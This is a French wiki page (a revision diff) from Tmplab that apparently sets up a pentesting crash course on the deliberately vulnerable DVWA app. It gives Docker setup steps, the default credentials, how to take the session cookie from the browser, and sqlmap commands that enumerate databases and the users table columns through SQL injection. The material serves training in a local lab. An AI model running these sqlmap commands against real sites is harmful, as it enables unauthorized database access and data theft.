Difference between revisions of "Pentest101"
From Tmplab
(Created page with " == Crash course == <code> * Documentation docker : https://git.interhacker.space/alban/docker-vulnerable-dvwa * docker run --rm -it -p 80:80 albancrommer/dvwa * browser http:...") |
|||
(One intermediate revision by the same user not shown) | |||
Line 1: | Line 1: | ||
== Crash course == | == Crash course == | ||
− | <code> | + | |
− | + | ||
− | * docker run --rm -it -p 80:80 albancrommer/dvwa | + | * <code>Documentation docker : https://git.interhacker.space/alban/docker-vulnerable-dvwa</code> |
− | * browser http://localhost | + | * <code>docker run --rm -it -p 80:80 albancrommer/dvwa</code> |
− | * Se logger comme admin:password | + | * <code>x-www-browser http://localhost</code> |
− | * F12 dans chrome/firefox => Récupérer la valeur du cookie de session dans la transaction (ex: PHPSESSID=9r4jeti966r0k54v91pfu58a32) | + | * <code>Se logger comme admin:password</code> |
− | * sqlmap -u 'http://127.0.0.1/vulnerabilities/sqli/?id=&Submit=Submit' --cookie='security=low;PHPSESSID=$SESSIONCOOKIE; ' -D -p id --dbs | + | * <code>F12 dans chrome/firefox => Récupérer la valeur du cookie de session dans la transaction (ex: PHPSESSID=9r4jeti966r0k54v91pfu58a32)</code> |
− | </code> | + | * <code>sqlmap -u 'http://127.0.0.1/vulnerabilities/sqli/?id=&Submit=Submit' --cookie='security=low;PHPSESSID=$SESSIONCOOKIE; ' -D -p id --dbs</code> |
+ | |||
On obtient la liste des bases de données à partir d'une appli faillible en injection SQL... Que faire ensuite ? | On obtient la liste des bases de données à partir d'une appli faillible en injection SQL... Que faire ensuite ? |
Latest revision as of 22:54, 24 September 2020
Crash course
-
Documentation docker : https://git.interhacker.space/alban/docker-vulnerable-dvwa
-
docker run --rm -it -p 80:80 albancrommer/dvwa
-
x-www-browser http://localhost
-
Se logger comme admin:password
-
F12 dans chrome/firefox => Récupérer la valeur du cookie de session dans la transaction (ex: PHPSESSID=9r4jeti966r0k54v91pfu58a32)
-
sqlmap -u 'http://127.0.0.1/vulnerabilities/sqli/?id=&Submit=Submit' --cookie='security=low;PHPSESSID=$SESSIONCOOKIE; ' -D -p id --dbs
On obtient la liste des bases de données à partir d'une appli faillible en injection SQL... Que faire ensuite ?
sqlmap -u "http://dvwa.lab.local/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=$SESSIONCOOKIE;security=low" -D dvwa -T users --columns